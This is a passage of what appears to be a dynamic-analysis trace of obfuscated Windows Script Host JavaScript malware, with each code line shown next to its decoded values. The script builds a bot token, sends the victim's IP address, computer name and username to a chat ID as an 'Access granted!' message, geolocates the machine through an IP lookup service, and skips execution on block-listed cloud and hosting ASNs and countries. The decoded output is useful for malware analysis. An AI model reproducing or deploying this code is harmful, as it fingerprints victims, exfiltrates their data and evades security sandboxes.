207	_0xb64ff9[_0x2f85cf ( 0x17e, 0x18b, 0x160, 0x16e ) ] ( JSON['stringify'] ( _0x93cd6d ) );	_0x2f85cf(382,395,352,366) ➔ "send" [object Object].stringify([object Object]) ➔ "{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"}" send("{"chat_id":"6481270908","text":"Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones"}") ➔ undefined
208	continue ;
209	case '7' :
210	var _0x430563 = '6968126468' + _0x5dbc47 ( - 0x1ae, - 0x1b5, - 0x172, - 0x1b3 ) + 'mhmKMp_RgC' + _0x5dbc47 ( - 0x1e5, - 0x194, - 0x1d0, - 0x1eb ) + _0x5dbc47 ( - 0x1c8, - 0x18f, - 0x228, - 0x199 );	_0x5dbc47(-430,-437,-370,-435) ➔ ":AAFBucF0U" _0x5dbc47(-485,-404,-464,-491) ➔ "JWJVC7hjGA" _0x5dbc47(-456,-399,-552,-409) ➔ "O25mwg"
211	continue ;
212	case '8' :
213	var _0xb64ff9 = new ActiveXObject ( _0x475121[_0x5dbc47 ( - 0x1f7, - 0x1a9, - 0x1c5, - 0x1a1 ) ] );	_0x5dbc47(-503,-425,-453,-417) ➔ "WAkBZ"
214	continue ;
215	}
216	break ;
217	}
218	}
219	function isASNBlocked(_0x3e29c0, _0xd908d4) {	isASNBlocked("AS3356 - Level 3 Communications, Inc.","US") ➔ false
220	var _0x235733 = {
221	'uWIbx' : function (_0x2b3af5, _0x242187) {
222	return _0x2b3af5 + _0x242187;
223	},
224	'jOasI' : function (_0x5316cd, _0x3c6d85) {
225	return _0x5316cd == _0x3c6d85;
226	},
227	'PiDcC' : _0x19e91a ( - 0x1db, - 0x210, - 0x199, - 0x193 ),	_0x19e91a(-475,-528,-409,-403) ➔ "string"
228	'WwoWq' : function (_0x4509fb, _0x4d09e5) {
229	return _0x4509fb + _0x4d09e5;
230	},
231	'bKqBF' : function (_0x10f064, _0x15d262) {
232	return _0x10f064 ( _0x15d262 );
233	},
234	'DsGGR' : function (_0x8da48e, _0x1b123a) {	[object Object].DsGGR("RFDqO","yXEmv") ➔ true
235	return _0x8da48e !== _0x1b123a;
236	},
237	'WGWiF' : _0x19e91a ( - 0x248, - 0x26b, - 0x26f, - 0x2ac ),	_0x19e91a(-584,-619,-623,-684) ➔ "yXEmv"
238	'lasVw' : function (_0x1d195d, _0x4f98b4) {	[object Object].lasVw("AS202401","AS3356") ➔ false [object Object].lasVw("AS16509","AS3356") ➔ false [object Object].lasVw("AS15169","AS3356") ➔ false [object Object].lasVw("AS30164","AS3356") ➔ false [object Object].lasVw("AS40861","AS3356") ➔ false [object Object].lasVw("AS14061","AS3356") ➔ false [object Object].lasVw("AS9009","AS3356") ➔ false [object Object].lasVw("AS14618","AS3356") ➔ false [object Object].lasVw("AS8075","AS3356") ➔ false [object Object].lasVw("AS16276","AS3356") ➔ false
239	return _0x1d195d === _0x4f98b4;
240	},
241	'cLnRJ' : function (_0x35e71, _0xec2a06) {	[object Object].cLnRJ("wsCvE","IRxBr") ➔ false
242	return _0x35e71 === _0xec2a06;
243	},
244	'rpEfG' : _0x21d893 ( 0x111, 0xd3, 0x12f, 0x13d ),	_0x21d893(273,211,303,317) ➔ "bKcXo"
245	'RhMoH' : _0x19e91a ( - 0x1c0, - 0x220, - 0x16c, - 0x1ce ),	_0x19e91a(-448,-544,-364,-462) ➔ "wsCvE"
246	'ElFHP' : 'IRxBr',
247	'vfNfB' : function (_0x4b698d, _0x1ea0b5) {	[object Object].vfNfB(0,1) ➔ true [object Object].vfNfB(1,1) ➔ false
248	return _0x4b698d < _0x1ea0b5;
249	},
250	'zCivw' : function (_0x57286a, _0x4bf02a) {	[object Object].zCivw("XLKNG","jKLFz") ➔ true
251	return _0x57286a !== _0x4bf02a;
252	},
253	'IICRR' : _0x19e91a ( - 0x18a, - 0x182, - 0x19c, - 0x13c ),	_0x19e91a(-394,-386,-412,-316) ➔ "XLKNG"
254	'TVcqO' : _0x21d893 ( 0x103, 0xae, 0x160, 0xf9 )	_0x21d893(259,174,352,249) ➔ "jKLFz"
255	}, _0xa7d4c0 = ! [];
256	try
257	{
258	if ( _0x235733[_0x21d893 ( 0x16d, 0x12d, 0x123, 0x181 ) ] ( _0x19e91a ( - 0x256, - 0x2a9, - 0x252, - 0x249 ), _0x235733[_0x19e91a ( - 0x236, - 0x1f2, - 0x21c, - 0x273 ) ] ) )	_0x21d893(365,301,291,385) ➔ "DsGGR" _0x19e91a(-598,-681,-594,-585) ➔ "RFDqO" _0x19e91a(-566,-498,-540,-627) ➔ "WGWiF" [object Object].DsGGR("RFDqO","yXEmv") ➔ true
259	{
260	for ( var _0x4cbf6 = - 0xf06 + 0x25e6 + - 0x16e0 ; _0x4cbf6 < blockedASNs['length'] ; _0x4cbf6 ++ )
261	{
262	var _0x3827b4 = blockedASNs[_0x4cbf6][_0x21d893 ( 0x164, 0x1a4, 0x1a6, 0x12d ) ] ( '\x20' ) [- 0x18b2 + 0x566 + 0x134c];	_0x21d893(356,420,422,301) ➔ "split" "AS202401".split(" ") ➔ AS202401 _0x21d893(356,420,422,301) ➔ "split" "AS16509".split(" ") ➔ AS16509 _0x21d893(356,420,422,301) ➔ "split" "AS15169".split(" ") ➔ AS15169 _0x21d893(356,420,422,301) ➔ "split" "AS30164".split(" ") ➔ AS30164 _0x21d893(356,420,422,301) ➔ "split" "AS40861".split(" ") ➔ AS40861 _0x21d893(356,420,422,301) ➔ "split" "AS14061".split(" ") ➔ AS14061 _0x21d893(356,420,422,301) ➔ "split" "AS9009".split(" ") ➔ AS9009 _0x21d893(356,420,422,301) ➔ "split" "AS14618".split(" ") ➔ AS14618 _0x21d893(356,420,422,301) ➔ "split" "AS8075".split(" ") ➔ AS8075 _0x21d893(356,420,422,301) ➔ "split" "AS16276".split(" ") ➔ AS16276
263	if ( _0x235733['lasVw'] ( _0x3827b4, _0x3e29c0['split'] ( '\x20' ) [- 0x67f * 0x1 + 0x107a * - 0x1 + 0x16f9 * 0x1] ) )	"AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS202401","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS16509","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS15169","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS30164","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS40861","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS14061","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS9009","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS14618","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS8075","AS3356") ➔ false "AS3356 - Level 3 Communications, Inc.".split(" ") ➔ AS3356,-,Level,3,Communications,,Inc. [object Object].lasVw("AS16276","AS3356") ➔ false
264	{
265	if ( _0x235733['cLnRJ'] ( _0x235733[_0x19e91a ( - 0x1d4, - 0x1ec, - 0x1ae, - 0x1ea ) ], _0x235733[_0x19e91a ( - 0x1d4, - 0x21b, - 0x226, - 0x206 ) ] ) )
266	{
267	_0xa7d4c0 = ! ! [];
268	break ;
269	}
270	else
271	{
272	var _0x339102 = {
273	};
274	return _0x339102[_0x21d893 ( 0x10a, 0x168, 0xd5, 0xb1 ) ] = '', _0x339102[_0x19e91a ( - 0x1aa, - 0x1b1, - 0x179, - 0x1c2 ) + 'e'] = '', _0x339102;
275	}
276	}
277	else
278	_0xa7d4c0 = ! [];
279	}
280	if ( ! _0xa7d4c0 )
281	{
282	if ( _0x235733[_0x21d893 ( 0xe8, 0xda, 0x126, 0x121 ) ] ( _0x235733[_0x19e91a ( - 0x1a4, - 0x18f, - 0x191, - 0x17c ) ], _0x235733[_0x21d893 ( 0xe9, 0x124, 0xb0, 0x11c ) ] ) )	_0x21d893(232,218,294,289) ➔ "cLnRJ" _0x19e91a(-420,-399,-401,-380) ➔ "RhMoH" _0x21d893(233,292,176,284) ➔ "ElFHP" [object Object].cLnRJ("wsCvE","IRxBr") ➔ false
283	{
284	var _0x134ef2 = {
285	};
286	return _0x134ef2[_0x21d893 ( 0x10a, 0x10e, 0xbc, 0x15b ) ] = '', _0x134ef2[_0x21d893 ( 0x15b, 0x160, 0x103, 0x16b ) + 'e'] = '', _0x134ef2;
287	}
288	else
289	for ( var _0x30185d = - 0x1d30 + - 0x1 * - 0x132d + 0xa03 ; _0x235733[_0x19e91a ( - 0x1b0, - 0x1dc, - 0x1d5, - 0x1ea ) ] ( _0x30185d, blockedCountries[_0x19e91a ( - 0x226, - 0x282, - 0x264, - 0x1cd ) ] ) ; _0x30185d ++ )	_0x19e91a(-432,-476,-469,-490) ➔ "vfNfB" _0x19e91a(-550,-642,-612,-461) ➔ "length" [object Object].vfNfB(0,1) ➔ true _0x19e91a(-432,-476,-469,-490) ➔ "vfNfB" _0x19e91a(-550,-642,-612,-461) ➔ "length" [object Object].vfNfB(1,1) ➔ false
290	{
291	if ( _0x235733[_0x21d893 ( 0x10e, 0x101, 0xde, 0xf3 ) ] ( _0x235733[_0x21d893 ( 0x157, 0x14c, 0x1bd, 0x189 ) ], _0x235733[_0x19e91a ( - 0x214, - 0x1cf, - 0x1fc, - 0x240 ) ] ) )	_0x21d893(270,257,222,243) ➔ "zCivw" _0x21d893(343,332,445,393) ➔ "IICRR" _0x19e91a(-532,-463,-508,-576) ➔ "TVcqO" [object Object].zCivw("XLKNG","jKLFz") ➔ true
292	{
293	if ( blockedCountries[_0x30185d] === _0xd908d4 )
294	{
295	_0xa7d4c0 = ! ! [];
296	break ;
297	}
298	}
299	else
300	_0xd0eacd = _0x235733[_0x21d893 ( 0x102, 0xe2, 0xe9, 0xb9 ) ] ( _0x51f3c8, '\x5c' ) + _0x24d965;
301	}
302	}
303	}
304	else
305	{
306	if ( _0x235733[_0x19e91a ( - 0x1ff, - 0x207, - 0x21d, - 0x203 ) ] ( _0x2af41d, _0x235733[_0x19e91a ( - 0x216, - 0x1f2, - 0x273, - 0x270 ) ] ) )
307	_0x3f081f = _0x235733['WwoWq'] ( '\x22', _0x418a68 ) + '\x22';
308	return _0x235733[_0x21d893 ( 0xdd, 0xc2, 0x97, 0x130 ) ] ( _0x1e2ce3, _0x9d0864 );
309	}
310	}
311	catch ( _0x3adbe0 )
312	{
313	}
314	function _0x21d893(_0x1689b8, _0x2c4fed, _0x39afbf, _0x3b424d) {	_0x21d893(273,211,303,317) ➔ "bKcXo" _0x21d893(259,174,352,249) ➔ "jKLFz" _0x21d893(365,301,291,385) ➔ "DsGGR" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split" _0x21d893(356,420,422,301) ➔ "split"
315	return _0x346f50 ( _0x3b424d, _0x1689b8 - - 0x162, _0x39afbf - 0x172, _0x3b424d - 0x99 );	_0x346f50(317,627,-67,164) ➔ "bKcXo" _0x346f50(249,613,-18,96) ➔ "jKLFz" _0x346f50(385,719,-79,232) ➔ "DsGGR" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split" _0x346f50(301,710,52,148) ➔ "split"
316	}
317	function _0x19e91a(_0x1417d5, _0x41256f, _0x559b3f, _0x1d6965) {	_0x19e91a(-475,-528,-409,-403) ➔ "string" _0x19e91a(-584,-619,-623,-684) ➔ "yXEmv" _0x19e91a(-448,-544,-364,-462) ➔ "wsCvE" _0x19e91a(-394,-386,-412,-316) ➔ "XLKNG" _0x19e91a(-598,-681,-594,-585) ➔ "RFDqO" _0x19e91a(-566,-498,-540,-627) ➔ "WGWiF" _0x19e91a(-420,-399,-401,-380) ➔ "RhMoH" _0x19e91a(-432,-476,-469,-490) ➔ "vfNfB" _0x19e91a(-550,-642,-612,-461) ➔ "length" _0x19e91a(-532,-463,-508,-576) ➔ "TVcqO"
318	return _0x44b961 ( _0x559b3f, _0x41256f - 0xbb, _0x559b3f - 0x141, _0x1417d5 - - 0xea );	_0x44b961(-409,-715,-730,-241) ➔ "string" _0x44b961(-623,-806,-944,-350) ➔ "yXEmv" _0x44b961(-364,-731,-685,-214) ➔ "wsCvE" _0x44b961(-412,-573,-733,-160) ➔ "XLKNG" _0x44b961(-594,-868,-915,-364) ➔ "RFDqO" _0x44b961(-540,-685,-861,-332) ➔ "WGWiF" _0x44b961(-401,-586,-722,-186) ➔ "RhMoH" _0x44b961(-469,-663,-790,-198) ➔ "vfNfB" _0x44b961(-612,-829,-933,-316) ➔ "length" _0x44b961(-508,-650,-829,-298) ➔ "TVcqO"
319	}
320	return _0xa7d4c0;
321	}
322	function parseJSON(_0x588d37) {	parseJSON("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object] parseJSON("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
323	var _0x53b86c = {
324	};
325	_0x53b86c['RpylQ'] =
326	function (_0x436b43, _0x1a4015) {	[object Object].RpylQ("hQEZa","hQEZa") ➔ true [object Object].RpylQ("hQEZa","hQEZa") ➔ true
327	return _0x436b43 === _0x1a4015;
328	}, _0x53b86c[_0x5e44a1 ( 0x376, 0x3be, 0x3d3, 0x394 ) ] = _0x54e6dd ( 0x35b, 0x340, 0x2e0, 0x328 );
329	function _0x54e6dd(_0x11aa10, _0x458799, _0x13d1bd, _0x41a655) {	_0x54e6dd(859,832,736,808) ➔ "hQEZa" _0x54e6dd(1021,909,1059,998) ➔ "GyHVj" _0x54e6dd(826,850,715,810) ➔ "FFspL" _0x54e6dd(720,873,862,810) ➔ "FFspL" _0x54e6dd(943,998,859,955) ➔ "parse" _0x54e6dd(859,832,736,808) ➔ "hQEZa" _0x54e6dd(1021,909,1059,998) ➔ "GyHVj" _0x54e6dd(826,850,715,810) ➔ "FFspL" _0x54e6dd(720,873,862,810) ➔ "FFspL" _0x54e6dd(943,998,859,955) ➔ "parse"
330	return _0x346f50 ( _0x13d1bd, _0x41a655 - 0x113, _0x13d1bd - 0x1e7, _0x41a655 - 0x1ee );	_0x346f50(736,533,249,314) ➔ "hQEZa" _0x346f50(1059,723,572,504) ➔ "GyHVj" _0x346f50(715,535,228,316) ➔ "FFspL" _0x346f50(862,535,375,316) ➔ "FFspL" _0x346f50(859,680,372,461) ➔ "parse" _0x346f50(736,533,249,314) ➔ "hQEZa" _0x346f50(1059,723,572,504) ➔ "GyHVj" _0x346f50(715,535,228,316) ➔ "FFspL" _0x346f50(862,535,375,316) ➔ "FFspL" _0x346f50(859,680,372,461) ➔ "parse"
331	}
332	_0x53b86c[_0x5e44a1 ( 0x476, 0x42f, 0x48c, 0x43e ) ] =	_0x5e44a1(1142,1071,1164,1086) ➔ "kEbMa" _0x5e44a1(1142,1071,1164,1086) ➔ "kEbMa"
333	function (_0x4fd73c, _0x1a6fdd) {
334	return _0x4fd73c === _0x1a6fdd;
335	}, _0x53b86c['adlWs'] = _0x54e6dd ( 0x3fd, 0x38d, 0x423, 0x3e6 ), _0x53b86c[_0x5e44a1 ( 0x46f, 0x438, 0x42d, 0x45d ) ] = _0x5e44a1 ( 0x434, 0x438, 0x46f, 0x4cd );
336	var _0x141491 = _0x53b86c;
337	function _0x5e44a1(_0x258bda, _0x221523, _0xf4c1c0, _0x531848) {	_0x5e44a1(886,958,979,916) ➔ "FFspL" _0x5e44a1(1142,1071,1164,1086) ➔ "kEbMa" _0x5e44a1(1135,1080,1069,1117) ➔ "ywLZN" _0x5e44a1(1076,1080,1135,1229) ➔ "owCKD" _0x5e44a1(886,958,979,916) ➔ "FFspL" _0x5e44a1(1142,1071,1164,1086) ➔ "kEbMa" _0x5e44a1(1135,1080,1069,1117) ➔ "ywLZN" _0x5e44a1(1076,1080,1135,1229) ➔ "owCKD"
338	return _0x346f50 ( _0x221523, _0xf4c1c0 - 0x1bc, _0xf4c1c0 - 0x53, _0x531848 - 0x2c );	_0x346f50(958,535,896,872) ➔ "FFspL" _0x346f50(1071,720,1081,1042) ➔ "kEbMa" _0x346f50(1080,625,986,1073) ➔ "ywLZN" _0x346f50(1080,691,1052,1185) ➔ "owCKD" _0x346f50(958,535,896,872) ➔ "FFspL" _0x346f50(1071,720,1081,1042) ➔ "kEbMa" _0x346f50(1080,625,986,1073) ➔ "ywLZN" _0x346f50(1080,691,1052,1185) ➔ "owCKD"
339	}
340	var _0x344937;
341	try
342	{
343	if ( _0x141491['RpylQ'] ( _0x141491[_0x54e6dd ( 0x33a, 0x352, 0x2cb, 0x32a ) ], _0x141491[_0x54e6dd ( 0x2d0, 0x369, 0x35e, 0x32a ) ] ) )	_0x54e6dd(826,850,715,810) ➔ "FFspL" _0x54e6dd(720,873,862,810) ➔ "FFspL" [object Object].RpylQ("hQEZa","hQEZa") ➔ true _0x54e6dd(826,850,715,810) ➔ "FFspL" _0x54e6dd(720,873,862,810) ➔ "FFspL" [object Object].RpylQ("hQEZa","hQEZa") ➔ true
344	_0x344937 = JSON[_0x54e6dd ( 0x3af, 0x3e6, 0x35b, 0x3bb ) ] ( _0x588d37 );	_0x54e6dd(943,998,859,955) ➔ "parse" [object Object].parse("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object] _0x54e6dd(943,998,859,955) ➔ "parse" [object Object].parse("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
345	else
346	{
347	var _0x37d3b5 = {
348	};
349	return _0x37d3b5[_0x54e6dd ( 0x3c5, 0x3ff, 0x394, 0x3a2 ) ] = _0x1ef263['ip'], _0x37d3b5[_0x54e6dd ( 0x35c, 0x31b, 0x3a8, 0x36d ) + 'me'] = _0x5a5ed5, _0x37d3b5[_0x54e6dd ( 0x3e7, 0x433, 0x3a4, 0x3d8 ) ] = _0x5be7b8, _0x37d3b5;
350	}
351	}
352	catch ( _0xdfa00b )
353	{
354	if ( _0x141491['kEbMa'] ( _0x141491[_0x5e44a1 ( 0x3e8, 0x3e6, 0x3d8, 0x38b ) ], _0x141491[_0x5e44a1 ( 0x3de, 0x3d8, 0x42d, 0x462 ) ] ) )
355	_0x1fb974 = ! [];
356	else
357	return null;
358	}
359	return _0x344937;
360	}
361	function getASNAndCountry() {	getASNAndCountry() ➔ [object Object]
362	var _0x1023eb = {
363	'fQDbd' : 'msxml2.xml' + _0x205b57 ( - 0x118, - 0xcc, - 0x11d, - 0xe3 ),	_0x205b57(-280,-204,-285,-227) ➔ "http"
364	'HdTFs' : _0x205b57 ( - 0xdb, - 0x69, - 0xab, - 0x8d ),	_0x205b57(-219,-105,-171,-141) ➔ "GET"
365	'HEXIh' : _0x205b57 ( - 0x15b, - 0xed, - 0x147, - 0xf3 ) + '0\x20(Windows' + _0x944257 ( - 0x248, - 0x266, - 0x2c5, - 0x280 ) + _0x205b57 ( - 0xe, - 0x52, - 0x76, - 0x64 ) + ')\x20AppleWeb' + 'Kit/537.36' + '\x20(KHTML,\x20l' + _0x205b57 ( - 0xf2, - 0xb6, - 0x64, - 0xb2 ) + _0x944257 ( - 0x289, - 0x228, - 0x21f, - 0x280 ) + _0x205b57 ( - 0xba, - 0x84, - 0x62, - 0x59 ) + '\x20Safari/53' + _0x944257 ( - 0x185, - 0x1bf, - 0x1b8, - 0x223 ),	_0x205b57(-347,-237,-327,-243) ➔ "Mozilla/5." _0x944257(-584,-614,-709,-640) ➔ " NT 10.0; " _0x205b57(-14,-82,-118,-100) ➔ "Win64; x64" _0x205b57(-242,-182,-100,-178) ➔ "ike Gecko)" _0x944257(-649,-552,-543,-640) ➔ " Chrome/73" _0x205b57(-186,-132,-98,-89) ➔ ".0.3683.86" _0x944257(-389,-447,-440,-547) ➔ "7.36"
366	'XPumc' : function (_0x401063, _0x5b2dec) {	[object Object].XPumc(200,200) ➔ true
367	return _0x401063 == _0x5b2dec;
368	},
369	'EfNJi' : function (_0x2981fc, _0xdad092) {	[object Object].EfNJi("NKzId","NKzId") ➔ false
370	return _0x2981fc !== _0xdad092;
371	},
372	'Fmpbn' : _0x944257 ( - 0x2b1, - 0x25b, - 0x294, - 0x20a ),	_0x944257(-689,-603,-660,-522) ➔ "NKzId"
373	'xkbao' : function (_0x41bb74, _0x95cdfb) {	[object Object].xkbao(function parseJSON(_0x588d37),"{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
374	return _0x41bb74 ( _0x95cdfb );	parseJSON("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
375	},
376	'RjEdj' : function (_0x1b16e5, _0x42cb31) {
377	return _0x1b16e5 !== _0x42cb31;
378	},
379	'EwnNG' : _0x944257 ( - 0x1bb, - 0x1aa, - 0x200, - 0x1c4 )	_0x944257(-443,-426,-512,-452) ➔ "VozMu"
380	};
381	function _0x205b57(_0xe60c53, _0x581ae6, _0x15d2b5, _0x3efcd8) {	_0x205b57(-280,-204,-285,-227) ➔ "http" _0x205b57(-219,-105,-171,-141) ➔ "GET" _0x205b57(-347,-237,-327,-243) ➔ "Mozilla/5." _0x205b57(-14,-82,-118,-100) ➔ "Win64; x64" _0x205b57(-242,-182,-100,-178) ➔ "ike Gecko)" _0x205b57(-186,-132,-98,-89) ➔ ".0.3683.86" _0x205b57(-227,-282,-106,-188) ➔ "HdTFs" _0x205b57(-59,-89,-153,-121) ➔ "https://js" _0x205b57(-287,-238,-221,-253) ➔ "okup.io/" _0x205b57(-180,-128,-190,-115) ➔ "setRequest"
382	return _0x44b961 ( _0xe60c53, _0x581ae6 - 0x112, _0x15d2b5 - 0x41, _0x3efcd8 - 0x52 );	_0x44b961(-280,-478,-350,-309) ➔ "http" _0x44b961(-219,-379,-236,-223) ➔ "GET" _0x44b961(-347,-511,-392,-325) ➔ "Mozilla/5." _0x44b961(-14,-356,-183,-182) ➔ "Win64; x64" _0x44b961(-242,-456,-165,-260) ➔ "ike Gecko)" _0x44b961(-186,-406,-163,-171) ➔ ".0.3683.86" _0x44b961(-227,-556,-171,-270) ➔ "HdTFs" _0x44b961(-59,-363,-218,-203) ➔ "https://js" _0x44b961(-287,-512,-286,-335) ➔ "okup.io/" _0x44b961(-180,-402,-255,-197) ➔ "setRequest"
383	}
384	function _0x944257(_0x3574b2, _0x128d6, _0x5cf093, _0x56a03a) {	_0x944257(-584,-614,-709,-640) ➔ " NT 10.0; " _0x944257(-649,-552,-543,-640) ➔ " Chrome/73" _0x944257(-389,-447,-440,-547) ➔ "7.36" _0x944257(-689,-603,-660,-522) ➔ "NKzId" _0x944257(-443,-426,-512,-452) ➔ "VozMu" _0x944257(-520,-591,-573,-600) ➔ "CreateObje" _0x944257(-583,-610,-526,-544) ➔ "open" _0x944257(-590,-621,-629,-607) ➔ "on.geoiplo" _0x944257(-381,-439,-360,-376) ➔ "send" _0x944257(-579,-561,-500,-597) ➔ "XPumc"
385	return _0x346f50 ( _0x3574b2, _0x128d6 - - 0x483, _0x5cf093 - 0x1c7, _0x56a03a - 0xd );	_0x346f50(-584,541,-1164,-653) ➔ " NT 10.0; " _0x346f50(-649,603,-998,-653) ➔ " Chrome/73" _0x346f50(-389,708,-895,-560) ➔ "7.36" _0x346f50(-689,552,-1115,-535) ➔ "NKzId" _0x346f50(-443,729,-967,-465) ➔ "VozMu" _0x346f50(-520,564,-1028,-613) ➔ "CreateObje" _0x346f50(-583,545,-981,-557) ➔ "open" _0x346f50(-590,534,-1084,-620) ➔ "on.geoiplo" _0x346f50(-381,716,-815,-389) ➔ "send" _0x346f50(-579,594,-955,-610) ➔ "XPumc"
386	}
387	try
388	{
389	var _0x196bcc = WScript[_0x944257 ( - 0x208, - 0x24f, - 0x23d, - 0x258 ) + 'ct'] ( _0x1023eb['fQDbd'] );	_0x944257(-520,-591,-573,-600) ➔ "CreateObje" Windows Script Host.CreateObject("msxml2.xmlhttp") ➔
390	_0x196bcc[_0x944257 ( - 0x247, - 0x262, - 0x20e, - 0x220 ) ] ( _0x1023eb[_0x205b57 ( - 0xe3, - 0x11a, - 0x6a, - 0xbc ) ], _0x205b57 ( - 0x3b, - 0x59, - 0x99, - 0x79 ) + _0x944257 ( - 0x24e, - 0x26d, - 0x275, - 0x25f ) + _0x205b57 ( - 0x11f, - 0xee, - 0xdd, - 0xfd ), ! [] ), _0x196bcc[_0x205b57 ( - 0xb4, - 0x80, - 0xbe, - 0x73 ) + _0x205b57 ( - 0x4d, - 0xcc, - 0xa5, - 0xac ) ] ( 'User-Agent', _0x1023eb[_0x205b57 ( - 0x65, - 0x46, - 0x4c, - 0x8e ) ] ), _0x196bcc[_0x944257 ( - 0x17d, - 0x1b7, - 0x168, - 0x178 ) ] ( );	_0x944257(-583,-610,-526,-544) ➔ "open" _0x205b57(-227,-282,-106,-188) ➔ "HdTFs" _0x205b57(-59,-89,-153,-121) ➔ "https://js" _0x944257(-590,-621,-629,-607) ➔ "on.geoiplo" _0x205b57(-287,-238,-221,-253) ➔ "okup.io/" open("GET","https://json.geoiplookup.io/",false) ➔ undefined _0x205b57(-180,-128,-190,-115) ➔ "setRequest" _0x205b57(-77,-204,-165,-172) ➔ "Header" _0x205b57(-101,-70,-76,-142) ➔ "HEXIh" setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36") ➔ undefined _0x944257(-381,-439,-360,-376) ➔ "send" send() ➔ undefined
391	if ( _0x1023eb[_0x944257 ( - 0x243, - 0x231, - 0x1f4, - 0x255 ) ] ( _0x196bcc[_0x205b57 ( - 0xfa, - 0x50, - 0xd6, - 0x9e ) ], 0xa * - 0x3a7 + - 0x232a + 0x4878 ) )	_0x944257(-579,-561,-500,-597) ➔ "XPumc" _0x205b57(-250,-80,-214,-158) ➔ "status" [object Object].XPumc(200,200) ➔ true
392	{
